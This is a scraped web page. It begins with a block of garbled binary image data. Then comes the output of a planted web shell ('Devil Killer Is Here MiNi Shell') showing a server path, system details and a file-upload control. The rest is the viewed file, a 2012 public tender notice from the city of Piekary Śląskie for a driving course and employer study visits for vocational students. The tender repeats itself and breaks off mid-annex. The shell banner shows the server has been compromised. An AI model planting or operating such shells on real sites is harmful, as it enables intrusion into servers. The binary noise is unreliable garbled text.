JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/190610-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Zorganizowanie i przeprowadzenie kursów, zajęć dodatkowych i dydaktyczno-wyrównawczych i praktyk w ramach pakietu wsparcia oraz wizyt studyjnych w roku 2012 dla uczestników projektu Mam zawód - mam pracę w regionie w ramach Działania 9.2 PO KL - Podniesienie atrakcyjności jakości szkolnictwa zawodowego, współfinansowanego z Europejskiego Funduszu Społecznego.
1. Zorganizowanie i przeprowadzanie kursu nauki jazdy kat. B dla 35 uczniów  w okresie 2 lipca do 31 sierpnia 2012 r.
2. Zorganizowanie wizyt studyjnych u pracodawców dla 75 uczniów w okresie od 20 czerwca do 6 lipca 2012 r.</b><br>
<b>Numer ogłoszenia: 190610 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów, zajęć dodatkowych i dydaktyczno-wyrównawczych i praktyk w ramach pakietu wsparcia oraz wizyt studyjnych w roku 2012 dla uczestników projektu Mam zawód - mam pracę w regionie w ramach Działania 9.2 PO KL - Podniesienie atrakcyjności jakości szkolnictwa zawodowego, współfinansowanego z Europejskiego Funduszu Społecznego.
1. Zorganizowanie i przeprowadzanie kursu nauki jazdy kat. B dla 35 uczniów  w okresie 2 lipca do 31 sierpnia 2012 r.
2. Zorganizowanie wizyt studyjnych u pracodawców dla 75 uczniów w okresie od 20 czerwca do 6 lipca 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursów, zajęć dodatkowych i dydaktyczno-wyrównawczych i praktyk w ramach pakietu wsparcia oraz wizyt studyjnych w roku 2012 dla uczestników projektu Mam zawód - mam pracę w regionie w ramach Działania 9.2 PO KL - Podniesienie atrakcyjności jakości szkolnictwa zawodowego, współfinansowanego z Europejskiego Funduszu Społecznego.

Zadanie 1:
Zorganizowanie i przeprowadzanie kursu nauki jazdy kat. B dla 35 uczniów  w okresie od 2 lipca do 31 sierpnia 2012 roku.

Do przetargu mogą przystąpić przedsiębiorcy wpisani do rejestru przedsiębiorców prowadzących Ośrodki Szkolenia Kierowców.

Kurs powinien uwzględniać minimum 30 godz. zajęć teoretycznych (godzina zajęć - 45 minut) i minimum 30 godzin zajęć praktycznych (godzina zajęć  - 60 minut) dla każdego ucznia. Czas trwania kursu dla jednego ucznia nie powinien być dłuższy niż 1 miesiąc kalendarzowy. W miesiącu lipcu 2012 będzie uczestniczyć w kursie około 25 osób, w miesiącu sierpniu 2012 będzie uczestniczyć w kursie około 10 osób. Program kursu musi obejmować również egzaminy wewnętrzne: teoretyczny i praktyczny, zorganizowanie odpowiednich badań lekarskich i wydanie orzeczenia lekarskiego o braku przeciwwskazań do prowadzenia pojazdów od lekarza uprawnionego do badania kierowców. Do kursu mogą przystąpić uczniowie, którzy uzyskają  orzeczenie o braku przeciwwskazań  zdrowotnych do kierowania pojazdem. Jeżeli uczeń nie uzyska orzeczenia nie będzie mógł przystąpić do kursu. Na tym etapie Zamawiający nie może przewidzieć, czy wszyscy uczniowie otrzymają takie orzeczenie. Koszt przeprowadzenia badań i wydania oświadczeń lekarskich dla 35 uczniów musi być zawarty w cenie kursu.

Kurs powinien przebiegać zgodnie z wymaganiami właściwych przepisów prawnych: Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r Nr 108, poz.908 z późn. zm. tekst jednolity) i Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834 z późn. zm.).

Część teoretyczna kursu powinna zostać przeprowadzona na terenie miasta Piekary Śląskie. Wykonawca zobowiązany jest w Formularzu ofertowym - załącznik nr 2 do SIWZ, wskazać dokładny adres miejsca odbywania zajęć teoretycznych. Wykonawca zobowiązany jest do zapewnienia uczestnikom kursu odpowiednich warunków lokalowych w miejscu kursu, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy. Sala do zajęć teoretycznych w warunkach codziennego użytku powinna mieć przeznaczenie wykładowe lub konferencyjne, powinna być wyposażona w pomoce dydaktyczne ułatwiające przekazywanie wiadomości uczestnikom kursu. Sala musi być wyposażona w odpowiednią, do liczby uczestników liczbę stolików i miejsc siedzących, właściwie oświetlona ogrzewana, przewietrzana. Wykonawca musi zapewnić uczestnikom kursu swobodny dostęp do pomieszczeń sanitarnych w budynku, w którym odbywa się szkolenie (tj. WC, umywalka wraz z dostępem do ciepłej wody). Część praktyczna kursu powinna zostać przeprowadzona tak, aby początek i koniec każdorazowych zajęć praktycznych miał miejsce na terenie Miasta Piekary Śląskie.

Wykonawca musi wykazać, że dysponuje odpowiednim potencjałem osobowym i technicznym zdolnym do wykonania zamówienia:
1) co najmniej 4 osobami posiadającymi uprawnienia instruktora nauki jazdy kat. B
2) co najmniej 4 pojazdami przystosowanymi do prowadzenia nauki jazdy na kursach prawa jazdy kat. B.

Wykonawca w ramach oferowanej ceny zapewni każdemu uczestnikowi materiały dydaktyczne, zgodne z zakresem tematycznym kursu, które z chwilą przekazania uczestnikom staną się ich własnością. Materiały dydaktyczne muszą być opatrzone w informację o współfinansowaniu kursu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 i uwagami Zamawiającego (logotypy Unii Europejskiej - Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki). 

Oferowana cena kursu musi zawierać:
przeprowadzenie zajęć teoretycznych i praktycznych (wg. wytycznych dot. programu kursu opisanego powyżej);
zorganizowanie badań lekarskich dla 35 osób i wydanie orzeczenia lekarskiego o braku przeciwwskazań do prowadzenia pojazdów od lekarza uprawnionego do badania kierowców;
materiały dydaktyczne.

Zamawiający dostarczy Wykonawcy 3 dni po podpisaniu umowy listę uczniów, którzy będą uczęszczać w kursie oraz wzory dokumentów projektowych, tj. wzór listy obecności oraz wzór dziennika kursu.

W terminie do 5 dnia kalendarzowych od podpisania umowy Wykonawca przekaże Zamawiającemu do Biura Projektu harmonogram kursu. W terminie do 3 dni po zakończeniu ostatnich zajęć kursu Wykonawca przekaże Zamawiającemu dziennik kursu. Kurs odbywać się będzie według harmonogramu, zaakceptowanego przez Koordynatora Projektu.


Zadanie 2:
Zorganizowanie wizyt studyjnych u pracodawców dla 75 uczniów w okresie od 20 czerwca do 6 lipca 2012 roku.

Wizyty studyjne powinny się odbywać w 4 grupach z zapewnioną opieką (2 opiekunów dla jednej grupy) oraz zorganizowanym transportem (autokarem lub busem) dla uczestników wizyty studyjnej do miejsca wizyty studyjnej z miasta Piekary Śląskie oraz z miejsca wizyty studyjnej do miasta Piekary Śląskie. 

Miejsce zbiórki dla 2 wizyt studyjnych odbędzie się: przy ulicy M. Skłodowskiej - Curie 49 w Piekarach Śląskich, dla 2 wizyt studyjnych odbędzie się: przy ulicy Bytomskiej 207 w Piekarach Śląskich.

Wizyty studyjne powinny odbywać się na terenie województwa śląskiego i trwać min. 5 godzin zegarowych. Organizator wizyt studyjnych powinien posiadać aktualne ubezpieczenie organizatora od odpowiedzialności cywilnej za ewentualne szkody powstałe przez uczniów w miejscu wizyty studyjnej.

Celem wizyt studyjnych jest m.in. zaznajomienie się uczniów ze specyfiką pracy w danym zawodzie oraz nawiązanie kontaktu uczniów z pracodawcą.

Wizyty studyjne powinny odbyć się u pracodawców w następujących branżach:

informatyczno-elektroniczna - 1 grupa (33 uczniów) w zakładzie zatrudniającym min. 20 osób.
ekonomiczna - 1 grupa  (11 uczniów) w zakładzie zatrudniającym min. 20 osób.
gastronomiczna (piekarz, cukiernik, kucharz) - 1 grupa (11 uczniów) w hotelu zatrudniającym min. 20 osób, działającym od min. 3 lat w województwie śląskim.
mechaniczna (blacharz/lakiernik/mechanik samochodowy) - 1 grupa (20 osób) w zakładzie zatrudniającym min. 40 osób.

Wizyty studyjne muszą odbywać się według programu wizyty studyjnej (dla każdej  branży z osobna) przedstawionego przez Wykonawcę i zaakceptowanego przez Biuro Projektu oraz Kierownika Szkolenia Praktycznego Zespołu Szkół nr 1 oraz Zasadniczej Szkoły Zawodowej.

Oferowana cena wizyt studyjnych musi zawierać:
organizację wizyt studyjnych;
wynagrodzenie dla opiekunów wizyt studyjnych;
zorganizowany transport.

Niezwłocznie po podpisaniu umowy Zamawiający przekaże Wykonawcy listę uczniów, którzy będą uczestniczyć w wizycie studyjnej, wzór listy obecności. W następnym dniu roboczym od przekazania przez Zamawiającego dokumentów (tj. lista uczniów uczestniczących w wizycie studyjnej, proponowany termin rozpoczęcia wizyty studyjnej) Wykonawca przekaże Zamawiającemu do Biura Projektu harmonogram wizyt studyjnych.

Wykonawca zapewnia sprawne technicznie środki transportu do wykonywania przewozów, spełniające wymagania opisane w SIWZ, wymagania techniczne określone przepisami prawa, posiadające aktualne ubezpieczenie OC i NNW.

Wykonawca zapewni wykwalifikowanych kierowców, posiadających stosowne uprawnienia do kierowania pojazdami silnikowymi oraz spełniających wymagania określone w przepisach ustawy z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym tj. Dz. U. z 2005 r. Nr 108, poz. 908, Ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz.U. z 2007 r. Nr 125, poz. 874, z późn. zm.).
 
Wykonawca odpowiada za sprawność techniczną pojazdów służących do wykonania usług stanowiących przedmiot zamówienia. Zamawiający wymaga, aby pojazdy służące do wykonania usług spełniały wszelkie wymagania techniczne i bezpieczeństwa zgodnie z obowiązującymi przepisami prawa.
 
Wykonawca będzie zobowiązany do:
a) podstawienia, zgodnie ze zleceniem pojazdu wraz z kierowcą,
b) telefonicznego informowania Zamawiającego o każdym opóźnieniu powyżej 15 minut
w podstawieniu pojazdu. Brak informacji będzie traktowany jak nie podstawienie pojazdu i będzie skutkował naliczeniem kary umownej w wysokości 100% przewidzianego wynagrodzenia,
d) każdorazowego ustalenia trzeźwości kierującego pojazdem, a w przypadku
stwierdzenia, że stan kierowcy wskazuje na spożycie alkoholu lub środków odurzających, odsunięcia go od wykonywania pracy.
 
Wykonawca zobowiązany jest do spełnienia wszelkich warunków wynikających z przepisów ustawy z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym tj. Dz. U. z 2005 r. Nr 108, poz. 908, Ustawy z dnia 6 września 2001 r. o transporcie drogowym (tj. Dz. U. z 2007 r. Nr 125, poz. 874, z późn. zm.) oraz Ustawy z dnia 15 listopada 1984 r. Prawo przewozowe (tj. Dz. U. z 2000 r. Nr 50, poz. 601, z późn. zm.).

CPV: 80200000-6 usługi szkolnictwa średniego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 - dysponowanie co najmniej 4 pojazdami przystosowanymi do prowadzenia nauki jazdy na kursach prawa jazdy kat. B</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1 - dysponowanie co najmniej 4 osobami posiadającymi uprawnienia instruktora nauki  prawa jazdy kat. B;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach gdy konieczność zmiany terminu realizacji wynika z :
- działaniem siły wyższej w rozumieniu przepisów Kodeksu Cywilnego;
- brakiem zainteresowania uczniów uczestnictwem w wizytach studyjnych;
- koniecznością wykonania zamówień dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie  41-940 Piekary Śląskie ul. Bytomska 84 (pokój 218).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie 41-940 Piekary Śląskie ul. Bytomska 84 (pokój 218).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> pakietu wsparcia oraz wizyt studyjnych w roku 2012 dla uczestników projektu Mam zawód - mam pracę w regionie w ramach Działania 9.2 PO KL - Podniesienie atrakcyjności jakości szkolnictwa zawodowego, współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzanie kursu nauki jazdy kat. B dla 35 uczniów  w okresie od 2 lipca do 31 sierpnia 2012 roku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzanie kursu nauki jazdy kat. B dla 35 uczniów  w okresie od 2 lipca do 31 sierpnia 2012 roku.

Do przetargu mogą przystąpić przedsiębiorcy wpisani do rejestru przedsiębiorców prowadzących Ośrodki Szkolenia Kierowców.

Kurs powinien uwzględniać minimum 30 godz. zajęć teoretycznych (godzina zajęć - 45 minut) i minimum 30 godzin zajęć praktycznych (godzina zajęć  - 60 minut) dla każdego ucznia. Czas trwania kursu dla jednego ucznia nie powinien być dłuższy niż 1 miesiąc kalendarzowy. W miesiącu lipcu 2012 będzie uczestniczyć w kursie około 25 osób, w miesiącu sierpniu 2012 będzie uczestniczyć w kursie około 10 osób. Program kursu musi obejmować również egzaminy wewnętrzne: teoretyczny i praktyczny, zorganizowanie odpowiednich badań lekarskich i wydanie orzeczenia lekarskiego o braku przeciwwskazań do prowadzenia pojazdów od lekarza uprawnionego do badania kierowców. Do kursu mogą przystąpić uczniowie, którzy uzyskają  orzeczenie o braku przeciwwskazań  zdrowotnych do kierowania pojazdem. Jeżeli uczeń nie uzyska orzeczenia nie będzie mógł przystąpić do kursu. Na tym etapie Zamawiający nie może przewidzieć, czy wszyscy uczniowie otrzymają takie orzeczenie. Koszt przeprowadzenia badań i wydania oświadczeń lekarskich dla 35 uczniów musi być zawarty w cenie kursu.

Kurs powinien przebiegać zgodnie z wymaganiami właściwych przepisów prawnych: Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005r Nr 108, poz.908 z późn. zm. tekst jednolity) i Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834 z późn. zm.).

Część teoretyczna kursu powinna zostać przeprowadzona na terenie miasta Piekary Śląskie. Wykonawca zobowiązany jest w Formularzu ofertowym - załącznik nr 2 do SIWZ, wskazać dokładny adres miejsca odbywania zajęć teoretycznych. Wykonawca zobowiązany jest do zapewnienia uczestnikom kursu odpowiednich warunków lokalowych w miejscu kursu, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy. Sala do zajęć teoretycznych w warunkach codziennego użytku powinna mieć przeznaczenie wykładowe lub konferencyjne, powinna być wyposażona w pomoce dydaktyczne ułatwiające przekazywanie wiadomości uczestnikom kursu. Sala musi być wyposażona w odpowiednią, do liczby uczestników liczbę stolików i miejsc siedzących, właściwie oświetlona ogrzewana, przewietrzana. Wykonawca musi zapewnić uczestnikom kursu swobodny dostęp do pomieszczeń sanitarnych w budynku, w którym odbywa się szkolenie (tj. WC, umywalka wraz z dostępem do ciepłej wody). Część praktyczna kursu powinna zostać przeprowadzona tak, aby początek i koniec każdorazowych zajęć praktycznych miał miejsce na terenie Miasta Piekary Śląskie.

Wykonawca musi wykazać, że dysponuje odpowiednim potencjałem osobowym i technicznym zdolnym do wykonania zamówienia:
1) co najmniej 4 osobami posiadającymi uprawnienia instruktora nauki jazdy kat. B
2) co najmniej 4 pojazdami przystosowanymi do prowadzenia nauki jazdy na kursach prawa jazdy kat. B.

Wykonawca w ramach oferowanej ceny zapewni każdemu uczestnikowi materiały dydaktyczne, zgodne z zakresem tematycznym kursu, które z chwilą przekazania uczestnikom staną się ich własnością. Materiały dydaktyczne muszą być opatrzone w informację o współfinansowaniu kursu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013 i uwagami Zamawiającego (logotypy Unii Europejskiej - Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki). 

Oferowana cena kursu musi zawierać:
przeprowadzenie zajęć teoretycznych i praktycznych (wg. wytycznych dot. programu kursu opisanego powyżej);
zorganizowanie badań lekarskich dla 35 osób i wydanie orzeczenia lekarskiego o braku przeciwwskazań do prowadzenia pojazdów od lekarza uprawnionego do badania kierowców;
materiały dydaktyczne.

